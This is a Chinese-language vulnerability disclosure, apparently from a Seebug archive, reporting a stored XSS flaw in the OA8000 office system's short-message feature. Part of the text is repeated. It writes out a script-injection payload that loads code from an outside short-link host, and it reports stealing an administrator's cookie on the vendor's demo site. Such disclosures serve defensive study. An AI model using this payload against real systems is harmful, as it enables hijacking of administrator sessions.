VULHUB ™

### 简要描述： ### 详细说明： 某OA办公系统储存型XSS#demo演示 ### 漏洞证明： 官方站：http://www.oa8000.com/online.htm [<img src="https://images.seebug.org/upload/201501/28111749eb5532787bf6f5d58891a4665685cf53.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/28111749eb5532787bf6f5d58891a4665685cf53.jpg) 官方演示站：http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa [<img src="https://images.seebug.org/upload/201501/28111815c4900c22e55b0ea9cb8c22f4be2597f6.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/28111815c4900c22e55b0ea9cb8c22f4be2597f6.jpg) 普通用户登录--短消息功能-发送短消息 [<img src="https://images.seebug.org/upload/201501/28111851f28e4c44e1177b600433c0738bf0070e.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/28111851f28e4c44e1177b600433c0738bf0070e.jpg) 首先以文本样式写入XSS代码：/"><script src=http://is.gd/7NT8vJ></script> 然后在转换为HTML样式 [<img...

### 简要描述： ### 详细说明： 某OA办公系统储存型XSS#demo演示 ### 漏洞证明： 官方站：http://www.oa8000.com/online.htm [<img src="https://images.seebug.org/upload/201501/28111749eb5532787bf6f5d58891a4665685cf53.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/28111749eb5532787bf6f5d58891a4665685cf53.jpg) 官方演示站：http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa [<img src="https://images.seebug.org/upload/201501/28111815c4900c22e55b0ea9cb8c22f4be2597f6.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/28111815c4900c22e55b0ea9cb8c22f4be2597f6.jpg) 普通用户登录--短消息功能-发送短消息 [<img src="https://images.seebug.org/upload/201501/28111851f28e4c44e1177b600433c0738bf0070e.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/28111851f28e4c44e1177b600433c0738bf0070e.jpg) 首先以文本样式写入XSS代码：/"><script src=http://is.gd/7NT8vJ></script> 然后在转换为HTML样式 [<img src="https://images.seebug.org/upload/201501/281119312323e4a0fb51855ff55b85e01a3ae449.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/281119312323e4a0fb51855ff55b85e01a3ae449.jpg) [<img src="https://images.seebug.org/upload/201501/281119582330e776a7669d1168863dad6323094b.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/281119582330e776a7669d1168863dad6323094b.jpg) 这里发送给了自己和管理员。 然后查看我们的信息 [<img src="https://images.seebug.org/upload/201501/2811204059225ee4427392efd3e819e047de9b1d.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2811204059225ee4427392efd3e819e047de9b1d.jpg) [<img src="https://images.seebug.org/upload/201501/28112048e5bb0d57e0eb73aa7024fb086dfac560.jpg" alt="7.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/28112048e5bb0d57e0eb73aa7024fb086dfac560.jpg) 成功获取到管理员cookie信息 [<img src="https://images.seebug.org/upload/201501/28112126359741b02896677c982e29995e4a4693.jpg" alt="8.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/28112126359741b02896677c982e29995e4a4693.jpg)